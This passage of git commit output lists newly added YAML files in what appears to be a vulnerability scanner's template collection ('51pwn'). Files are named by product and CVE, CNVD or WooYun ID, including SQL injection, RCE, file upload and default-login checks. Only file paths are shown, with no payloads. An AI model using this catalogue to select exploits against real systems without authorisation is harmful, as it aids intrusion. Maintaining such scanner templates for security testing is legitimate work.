config/51pwn/yaml/CMSMS/CVE-2018-10523-1.yaml create mode 100755 config/51pwn/yaml/CMSMS/CVE-2018-10523.yaml create mode 100755 config/51pwn/yaml/CMSTOP/CMSTop-vote-sqli.yaml create mode 100755 config/51pwn/yaml/CMSTOP/wooyun-2014-054693.yaml create mode 100755 config/51pwn/yaml/CMSimple/CVE-2008-2650.yaml create mode 100755 config/51pwn/yaml/CSE Bookstore/CVE-2020-36112.yaml create mode 100755 config/51pwn/yaml/Cacti/CVE-2020-8813.yaml create mode 100755 config/51pwn/yaml/Cacti/CVE-2021-26247.yaml create mode 100755 config/51pwn/yaml/Cacti/Cacti-Weathermap-FileUpload.yaml create mode 100755 config/51pwn/yaml/Cacti/cacti-WeakPass.yaml create mode 100755 config/51pwn/yaml/Cacti/cacti-cacti-info.yaml create mode 100755 config/51pwn/yaml/Cacti/cacti-sql-info.yaml create mode 100755 config/51pwn/yaml/Cacti/wooyun-2016-0190596.yaml create mode 100755 "config/51pwn/yaml/CactiEZ\346\217\222\344\273\266Weathermap/Cacti-Weathermap-FileWrite.yaml" create mode 100755 config/51pwn/yaml/Camtron IP Camera/CVE-2010-4231.yaml create mode 100755 config/51pwn/yaml/Canal/alibaba-canal-info-leak.yaml create mode 100755 config/51pwn/yaml/Canal/canal-default-login.yaml create mode 100755 config/51pwn/yaml/Canvas LMS/CVE-2020-5775.yaml create mode 100755 config/51pwn/yaml/CaseAware/CVE-2017-5631.yaml create mode 100755 config/51pwn/yaml/Cassandra/CVE-2021-44521.yaml create mode 100755 config/51pwn/yaml/CentOS Web Panel/CVE-2018-18323.yaml create mode 100755 config/51pwn/yaml/Cherokee/CVE-2006-1681.yaml create mode 100755 config/51pwn/yaml/Chyrp/CVE-2011-2744.yaml create mode 100755 config/51pwn/yaml/Chyrp/CVE-2011-2780.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CNVD-2018-11985.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19403.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19569.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CVE-2018-12634.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CVE-2018-16668.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CVE-2018-16670.yaml create mode 100755 config/51pwn/yaml/CirCarLife Scada/CVE-2018-16671.yaml create mode 100755 config/51pwn/yaml/Cisco 7937G/CVE-2020-16139.yaml create mode 100755 config/51pwn/yaml/Cisco DDR2200 ADSL2/CNVD-2017-25744.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2017-3881.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2018-0127.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2019-1653.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2019-1821.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2021-1497.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2021-1498.yaml create mode 100755 config/51pwn/yaml/Cisco IOS/CVE-2021-1499.yaml create mode 100755 config/51pwn/yaml/Cisco SD-WAN vManage/CVE-2020-26073.yaml create mode 100755 config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2011-3315.yaml create mode 100755 config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2013-5528.yaml create mode 100755 config/51pwn/yaml/Citrix ShareFile/CVE-2020-8982.yaml create mode 100755 "config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay)/CVE-2019-19781.yaml" create mode 100755 "config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8191.yaml" create mode 100755 "config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8193.yaml" create mode 100755 "config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8194.yaml" create mode 100755 config/51pwn/yaml/Clansphere CMS/CVE-2021-27310.yaml create mode 100755 config/51pwn/yaml/ClinicCases/CVE-2021-38704.yaml create mode 100755 config/51pwn/yaml/Cobbler/CVE-2018-1000226.yaml create mode 100755 config/51pwn/yaml/Cobbler/CVE-2021-40323.yaml create mode 100755 config/51pwn/yaml/Cockpit/CVE-2020-35846.yaml create mode 100755 config/51pwn/yaml/Cockpit/CVE-2020-35847.yaml create mode 100755 config/51pwn/yaml/Cockpit/CVE-2020-35848.yaml create mode 100755 config/51pwn/yaml/Cocoon/CVE-2020-11991.yaml create mode 100755 config/51pwn/yaml/Cofax/CVE-2005-4385.yaml create mode 100755 config/51pwn/yaml/ColdFusion/CVE-2009-1872.yaml create mode 100755 config/51pwn/yaml/ColdFusion/CVE-2010-2861.yaml create mode 100755 config/51pwn/yaml/ColdFusion/CVE-2018-15961.yaml create mode 100755 config/51pwn/yaml/ColdFusion/coldfusion-debug-xss.yaml create mode 100755 config/51pwn/yaml/ColdFusion/unpatched-coldfusion.yaml create mode 100755 config/51pwn/yaml/Combodo iTop/CVE-2015-6544.yaml create mode 100755 config/51pwn/yaml/CommCell/CVE-2020-25780.yaml create mode 100755 config/51pwn/yaml/Comodo UTM Firewall/CVE-2018-17431.yaml create mode 100755 config/51pwn/yaml/Consul/CVE-2020-25864.yaml create mode 100755 config/51pwn/yaml/Consul/consul-rexec-rce.yaml create mode 100755 config/51pwn/yaml/Consul/consul-service-rce.yaml create mode 100755 config/51pwn/yaml/Coremail/coremail-config-disclosure.yaml create mode 100755 config/51pwn/yaml/CouchCMS/CVE-2018-7662.yaml create mode 100755 config/51pwn/yaml/CouchDB/CVE-2017-12635.yaml create mode 100755 config/51pwn/yaml/CouchDB/couchdb-unauth.yaml create mode 100755 config/51pwn/yaml/CraftCMS/CVE-2020-9757.yaml create mode 100755 config/51pwn/yaml/CyBroHttpServer/CVE-2018-16133.yaml create mode 100755 config/51pwn/yaml/Cyberoam NetGenie/CVE-2021-38702.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2018-10822.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2018-10823.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2018-15517.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2019-13101.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2019-16920.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2019-17506.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2020-24579.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2020-25078.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2020-25506.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2020-9376.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2021-21816.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2021-46379.yaml create mode 100755 config/51pwn/yaml/D-Link/CVE-2021-46381.yaml create mode 100755 config/51pwn/yaml/D-Link/dlink-850L-info-leak.yaml create mode 100755 config/51pwn/yaml/D-Link/dlink-file-read.yaml create mode 100755 "config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-0929.yaml" create mode 100755 "config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-9822.yaml" create mode 100755 config/51pwn/yaml/DVR/CVE-2018-9995.yaml create mode 100755 config/51pwn/yaml/Dahua IPC/CVE-2021-33044.yaml create mode 100755 config/51pwn/yaml/Dairy Farm Shop Management System/CVE-2020-5307.yaml create mode 100755 config/51pwn/yaml/Dasan GPON/CVE-2018-10562.yaml create mode 100755 config/51pwn/yaml/Dayrui FineCms/CVE-2017-11584.yaml create mode 100755 config/51pwn/yaml/Deciso OPNsense/CVE-2020-23015.yaml create mode 100755 config/51pwn/yaml/Dell EMC/CVE-2018-1207.yaml create mode 100755 config/51pwn/yaml/Deltek Maconomy/CVE-2019-12314.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-V72-SQLi.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-WechatPlugins-Unauth.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-ece-language.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-info-api.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-lfd-hux_wx.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-lfd-milu_seotool.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-sqli-batch_common.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-sqli-forummission.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-sqli-nds_ques_viewanswe.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-sqli-v63shop_goods.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-unauthorized-tools.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-xss-admin.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-xss-admincp.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz-xss-ajax.yaml create mode 100755 config/51pwn/yaml/Discuz!/Discuz_x3_2-sqlimisc.yaml create mode 100755 config/51pwn/yaml/Discuz!/Wooyun-2010-080723.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-info-admincp.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-info-config_ucenter.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-rce-misc.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-sqli-my.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-sqli-nds_up_ques.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-sqli-shop.yaml create mode 100755 config/51pwn/yaml/Discuz!/discuz-ssrf-forum.yaml create mode 100755 config/51pwn/yaml/Discuz!/wooyun-2015-0131386.yaml create mode 100755 config/51pwn/yaml/Django/CVE-2017-12794.yaml create mode 100755 config/51pwn/yaml/Django/CVE-2018-14574.yaml create mode 100755 config/51pwn/yaml/Django/CVE-2020-9402.yaml create mode 100755 config/51pwn/yaml/Docker/docker-compose-config.yaml create mode 100755 config/51pwn/yaml/Docker/docker-registry.yaml create mode 100755 config/51pwn/yaml/Docker/dockercfg-config.yaml create mode 100755 config/51pwn/yaml/Docker/dockerfile-hidden-disclosure.yaml create mode 100755 config/51pwn/yaml/Docker/exposed-docker-api.yaml create mode 100755 config/51pwn/yaml/Docker/misconfigured-docker.yaml create mode 100755 config/51pwn/yaml/DokuWiki/CVE-2017-12583.yaml create mode 100755 config/51pwn/yaml/Dolibarr/CVE-2012-1226.yaml create mode 100755 config/51pwn/yaml/Dolibarr/CVE-2018-10095.yaml create mode 100755 config/51pwn/yaml/DolphinScheduler/dolphinscheduler-default-login.yaml create mode 100755 config/51pwn/yaml/DomPHP/CVE-2014-10037.yaml create mode 100755 config/51pwn/yaml/Dotnetcms/Dotnetcms-SQLi.yaml create mode 100755 config/51pwn/yaml/Dream Multimedia Dreambox devices/CVE-2017-15287.yaml create mode 100755 config/51pwn/yaml/Drupai CMS/CVE-2014-3704.yaml create mode 100755 config/51pwn/yaml/Drupai CMS/CVE-2018-7600.yaml create mode 100755 config/51pwn/yaml/Drupai CMS/CVE-2018-7602.yaml create mode 100755 config/51pwn/yaml/Drupai CMS/CVE-2018-9205.yaml create mode 100755 config/51pwn/yaml/Drupai CMS/CVE-2019-6340.yaml create mode 100755 config/51pwn/yaml/Drupal/CVE-2021-32682.yaml create mode 100755 config/51pwn/yaml/Dubbo/dubbo-admin-default-login.yaml create mode 100755 config/51pwn/yaml/DuomiCms/duomicms-sql-injection.yaml create mode 100755 "config/51pwn/yaml/E-ZKECO \345\256\211\345\205\250\347\262\276\347\273\206\345\214\226\347\256\241\347\220\206\344\272\221\345\271\263\345\217\260/CNVD-2020-57264.yaml" create mode 100755 config/51pwn/yaml/E-office/CNVD-2021-49104.yaml create mode 100755 config/51pwn/yaml/E-office/E-office-do_excel-FileUpload.yaml create mode 100755 config/51pwn/yaml/E-office/E-office10-Upload.yaml create mode 100755 config/51pwn/yaml/E-office/wooyun-2010-087500.yaml create mode 100755 config/51pwn/yaml/E-office/wooyun-2015-0125282.yaml create mode 100755 config/51pwn/yaml/E-office/wooyun-2015-0125592.yaml create mode 100755 config/51pwn/yaml/E-office/wooyun-2015-0125638.yaml create mode 100755 config/51pwn/yaml/ECTouch CMS/etouch-v2-sqli.yaml create mode 100755 config/51pwn/yaml/EPrints/CVE-2021-26475.yaml create mode 100755 config/51pwn/yaml/EWEB Gateway/CNVD-2021-09650.yaml create mode 100755 config/51pwn/yaml/EWEB Gateway/ruijie-eg-password-leak.yaml create mode 100755 config/51pwn/yaml/EWEB Gateway/ruijie-eg-rce.yaml create mode 100755 config/51pwn/yaml/EWEB Gateway/ruijie-networks-rce.yaml create mode 100755 config/51pwn/yaml/Eaton Intelligent Power Manager/CVE-2018-12031.yaml create mode 100755 config/51pwn/yaml/Ecshop/Ecshop-CollectionList-SQLi.yaml create mode 100755 config/51pwn/yaml/Ecshop/Ecshop-Rce.yaml create mode 100755 config/51pwn/yaml/Ecshop/ecshop-sqli.yaml create mode 100755 config/51pwn/yaml/Edgeline Infrastructure Management/CVE-2021-29203.yaml create mode 100755 config/51pwn/yaml/Elastic EpiServer Find/CVE-2020-24550.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/CVE-2014-3120.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/CVE-2015-1427.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/CVE-2015-3337.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/CVE-2015-5531.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/CVE-2021-22145.yaml create mode 100755 config/51pwn/yaml/ElasticSearch/elasticsearch.yaml create mode 100755 config/51pwn/yaml/Embedthis GoAhead/CVE-2017-17562.yaml create mode 100755 config/51pwn/yaml/Emby Server/CVE-2020-26948.yaml create mode 100755 config/51pwn/yaml/Employee Records System/CVE-2019-20183.yaml create mode 100755 config/51pwn/yaml/Endress+Hauser WirelessHART Fieldgate SWG70/CVE-2018-16059.yaml create mode 100755 config/51pwn/yaml/Enterprise Email Archive(EEA)/CNVD-2021-10543.yaml create mode 100755 config/51pwn/yaml/Ericsson Drutt Mobile Service Delivery Platform/CVE-2015-2166.yaml create mode 100755 config/51pwn/yaml/Erxes/CVE-2021-32853.yaml create mode 100755 config/51pwn/yaml/Etherpad Lite/CVE-2018-9845.yaml create mode 100755 config/51pwn/yaml/Exchange/CVE-2021-26855.yaml create mode 100755 config/51pwn/yaml/Exchange/CVE-2021-34473.yaml create mode 100755 config/51pwn/yaml/Exchange/CVE-2021-41349.yaml create mode 100755 config/51pwn/yaml/ExponentCMS/CVE-2021-38751.yaml create mode 100755 config/51pwn/yaml/Express handlebars/CVE-2021-32820.yaml create mode 100755 config/51pwn/yaml/EyouCMS/CVE-2021-39501.yaml create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/YonyouFE-sqli-schedule.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-082455.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-086697.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2015-093724.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-SQLI-file_publish_open.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-sqli-assetsTestList.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyou_fe-sqli-left.yaml" create mode 100755 "config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/youyou_FE-SQLI-showphoto.yaml" create mode 100755 config/51pwn/yaml/FHEM/CVE-2020-19360.yaml create mode 100755 config/51pwn/yaml/FTD/ASA/CVE-2018-0296.yaml create mode 100755 config/51pwn/yaml/FTD/ASA/CVE-2020-3187.yaml create mode 100755 config/51pwn/yaml/FTD/ASA/CVE-2020-3452.yaml create mode 100755 config/51pwn/yaml/FTD/ASA/CVE-2020-3580.yaml create mode 100755 config/51pwn/yaml/FUEL CMS/CVE-2018-16763.yaml create mode 100755 config/51pwn/yaml/Fangweicms/Fangweicms-SQLi.yaml create mode 100755 config/51pwn/yaml/Fastjson/fastjson1_2_47-rce-Deserialization.yaml create mode 100755 config/51pwn/yaml/FiberHome/CVE-2017-15647.yaml create mode 100755 config/51pwn/yaml/FineReport/finereport-path-traversal.yaml create mode 100755 config/51pwn/yaml/Firewall Analyze/CVE-2012-4889.yaml create mode 100755 config/51pwn/yaml/Flask/CVE-2021-32618.yaml create mode 100755 config/51pwn/yaml/Flatnux/CVE-2012-4878.yaml create mode 100755 config/51pwn/yaml/FlightPath/CVE-2019-13396.yaml create mode 100755 config/51pwn/yaml/ForgeRock AM/CVE-2021-35464.yaml create mode 100755 config/51pwn/yaml/Fortigate SSL VPN/CVE-2015-1880.yaml create mode 100755 config/51pwn/yaml/Fortilogger/CVE-2021-3378.yaml create mode 100755 config/51pwn/yaml/Fortinet FortiMail/CVE-2021-43062.yaml create mode 100755 config/51pwn/yaml/Fortinet FortiOS /CVE-2016-3978.yaml create mode 100755 config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13379.yaml create mode 100755 config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13380.yaml create mode 100755 config/51pwn/yaml/Fortinet FortiWeb/CVE-2021-22122.yaml create mode 100755 config/51pwn/yaml/GNU Bash/CVE-2014-6271.yaml create mode 100755 config/51pwn/yaml/GateOne/CVE-2020-35736.yaml create mode 100755 "config/51pwn/yaml/Geutebr\303\274ck G-Cam E2 /CVE-2021-33544.yaml" create mode 100755 config/51pwn/yaml/Ghost CMS/CVE-2021-29484.yaml create mode 100755 config/51pwn/yaml/Gila CMS/CVE-2020-5515.yaml create mode 100755 config/51pwn/yaml/GitLab/CVE-2020-26413.yaml create mode 100755 config/51pwn/yaml/GitLab/CVE-2021-22205.yaml create mode 100755 config/51pwn/yaml/GitLab/CVE-2021-22214.yaml create mode 100755 config/51pwn/yaml/GitLab/CVE-2021-4191.yaml create mode 100755 config/51pwn/yaml/GitLab/gitlab-api-user-enum.yaml create mode 100755 config/51pwn/yaml/GitLab/gitlab-public-repos.yaml create mode 100755 config/51pwn/yaml/GitLab/gitlab-public-snippets.yaml create mode 100755 config/51pwn/yaml/GitLab/gitlab-uninitialized-password.yaml create mode 100755 config/51pwn/yaml/GitLab/gitlab-weak-login.yaml create mode 100755 config/51pwn/yaml/Gitblit/CVE-2022-31268.yaml create mode 100755 config/51pwn/yaml/GoCD/CVE-2021-43287.yaml create mode 100755 config/51pwn/yaml/GoCD/gocd-cruise-configuration.yaml create mode 100755 config/51pwn/yaml/GoCD/gocd-encryption-key.yaml create mode 100755 config/51pwn/yaml/GoCD/gocd-login.yaml create mode 100755 config/51pwn/yaml/GoCD/gocd-unauth-dashboard.yaml create mode 100755 config/51pwn/yaml/Gogs/CVE-2014-8682.yaml create mode 100755 config/51pwn/yaml/Gogs/CVE-2018-18925.yaml create mode 100755 config/51pwn/yaml/Google Kubernetes/CVE-2018-18264.yaml create mode 100755 config/51pwn/yaml/Google Kubernetes/CVE-2019-11248.yaml create mode 100755 config/51pwn/yaml/Google Kubernetes/kubernetes-kustomization-disclosure.yaml create mode 100755 config/51pwn/yaml/Google Kubernetes/kubernetes-pods-api.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2020-11110.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2021-27358.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2021-39226.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2021-41174.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2021-43798.yaml create mode 100755 config/51pwn/yaml/Grafana/CVE-2022-26148.yaml create mode 100755 config/51pwn/yaml/Grafana/grafana-default-login.yaml create mode 100755 config/51pwn/yaml/Grafana/grafana-public-signup.yaml create mode 100755 config/51pwn/yaml/GrandNode/CVE-2019-12276.yaml create mode 100755 config/51pwn/yaml/Graphite/CVE-2017-18638.yaml create mode 100755 config/51pwn/yaml/Grav CMS/CVE-2018-5233.yaml create mode 100755 config/51pwn/yaml/Grav CMS/CVE-2020-11529.yaml create mode 100755 config/51pwn/yaml/Gridx/CVE-2020-19625.yaml create mode 100755 "config/51pwn/yaml/H3C SecPath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/unauthorized-h3csecparh-login.yaml" create mode 100755 "config/51pwn/yaml/H3C\346\231\272\350\203\275\347\256\241\347\220\206\344\270\255\345\277\203(IMC)/h3c-imc-rce.yaml" create mode 100755 config/51pwn/yaml/HBase/apache-hbase-unauth.yaml create mode 100755 "config/51pwn/yaml/HIM\345\237\272\347\241\200\345\271\263\345\217\260\347\256\241\347\220\206\347\263\273\347\273\237/hjtcloud-arbitrary-file-read.yaml" create mode 100755 config/51pwn/yaml/HPE Data Protector/CVE-2016-2004.yaml create mode 100755 config/51pwn/yaml/HPE System Management Homepage/CVE-2017-12544.yaml create mode 100755 config/51pwn/yaml/Hadoop/hadoop-unauth.yaml create mode 100755 config/51pwn/yaml/Hadoop/yarn-resourcemanager-rce.yaml create mode 100755 config/51pwn/yaml/Harbor/CVE-2019-16097.yaml create mode 100755 "config/51pwn/yaml/HiBOS\351\205\222\345\272\227\345\256\275\345\270\246\350\277\220\350\220\245\347\263\273\347\273\237/AmttHiboss-Server-Rce.yaml" create mode 100755 config/51pwn/yaml/HighMail/CVE-2020-23517.yaml create mode 100755 config/51pwn/yaml/Hikvision Cameras/CVE-2017-7921.yaml create mode 100755 config/51pwn/yaml/Hikvision Web Server/CVE-2021-36260.yaml create mode 100755 config/51pwn/yaml/Hitachi Vantara Pentaho/CVE-2021-31602.yaml create mode 100755 config/51pwn/yaml/Hitachi Vantara Pentaho/pentaho-default-login.yaml create mode 100755 config/51pwn/yaml/Homematic CCU3/CVE-2019-9726.yaml create mode 100755 config/51pwn/yaml/Hongdian H8922/CVE-2021-28149.yaml create mode 100755 config/51pwn/yaml/Hongdian H8922/CVE-2021-28150.yaml create mode 100755 config/51pwn/yaml/Hongdian H8922/CVE-2021-28151.yaml create mode 100755 config/51pwn/yaml/Horde Framework/CVE-2005-3344.yaml create mode 100755 config/51pwn/yaml/Horde Framework/CVE-2009-0932.yaml create mode 100755 "config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2019-8937.yaml" create mode 100755 "config/51pwn/yaml/HotelDruid\351\205\222\345\272\227\347\256\241\347\220\206\347\263\273\347\273\237/CVE-2021-37833.yaml" create mode 100755 config/51pwn/yaml/Hp Integrated_lights-Out_4/CVE-2017-12542.yaml create mode 100755 config/51pwn/yaml/IBM Lotus Domino WebMail/CVE-2005-2428.yaml create mode 100755 config/51pwn/yaml/IBM Maximo Asset Management/CVE-2020-4463.yaml create mode 100755 config/51pwn/yaml/IPConfigure Orchid Core VMS/CVE-2018-10956.yaml create mode 100755 config/51pwn/yaml/IceWarp Mail Server/CVE-2015-1503.yaml create mode 100755 config/51pwn/yaml/IceWarp Mail Server/CVE-2019-12593.yaml create mode 100755 config/51pwn/yaml/IceWarp Mail Server/CVE-2020-27982.yaml create mode 100755 config/51pwn/yaml/IceWarp WebMail Server/CVE-2020-8512.yaml create mode 100755 config/51pwn/yaml/ImpressCMS/CVE-2021-26598.yaml create mode 100755 "config/51pwn/yaml/InfluxData\346\225\260\346\215\256\345\272\223/unauthenticated-influxdb.yaml" create mode 100755 "config/51pwn/yaml/Intel McAfee Network Data Loss Prevention\357\274\210NDLP\357\274\211/CVE-2017-4011.yaml" create mode 100755 config/51pwn/yaml/Intelbras IWR 3000N/CVE-2021-3017.yaml create mode 100755 "config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2000-0114.yaml" create mode 100755 "config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2017-7269.yaml" create mode 100755 config/51pwn/yaml/Ivanti Avalanche/CVE-2021-30497.yaml create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-DBCONFIG-FILEREAD.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Downfile_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Import_Jsp-FileUpload.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Index_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-JCMSopr_Domsg_JSP-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-M_5_b-XSS.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Datacall_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Wap_Col_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Dictionary_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Flow_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Model_JSP-Unauth.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Recemsg_Jsp-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Selectx_List_JSP-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-lm_sys_opr_uploadimg_JSP-FileUpload.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-m_1_9_user_Down_Jsp-FileDownload.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-opr_classajax_SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-Ldap-SecretKeyLeak.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-module_voting_down-FileDownload.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Lm-FileRead.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Coltop_Interface_JSP-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Columncount_Downfile_JSP-FileInclude.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Interface_Styletop_Arttop_interface_JSP-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Que_Style_Coltop_JSP-SQLi.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-VerifyCodeServlet-Unauth.yaml" create mode 100755 "config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-opr_copycode_jsp-SQLi.yaml" create mode 100755 config/51pwn/yaml/JEESNS/CVE-2020-19282.yaml create mode 100755 config/51pwn/yaml/JEESNS/CVE-2020-19283.yaml create mode 100755 config/51pwn/yaml/JEESNS/CVE-2020-19295.yaml create mode 100755 config/51pwn/yaml/Java EE/CVE-2017-1000486.yaml create mode 100755 config/51pwn/yaml/Jboss/CVE-2010-1871.yaml create mode 100755 config/51pwn/yaml/Jboss/CVE-2017-12149.yaml create mode 100755 config/51pwn/yaml/Jboss/jboss-seam-debug-page.yaml create mode 100755 config/51pwn/yaml/Jboss/jboss-web-console.yaml create mode 100755 config/51pwn/yaml/Jboss/jmx-console.yaml create mode 100755 config/51pwn/yaml/Jboss/jmx-default-login.yaml create mode 100755 config/51pwn/yaml/Jeedom/CVE-2020-9036.yaml create mode 100755 config/51pwn/yaml/Jellyfin/CVE-2021-21402.yaml create mode 100755 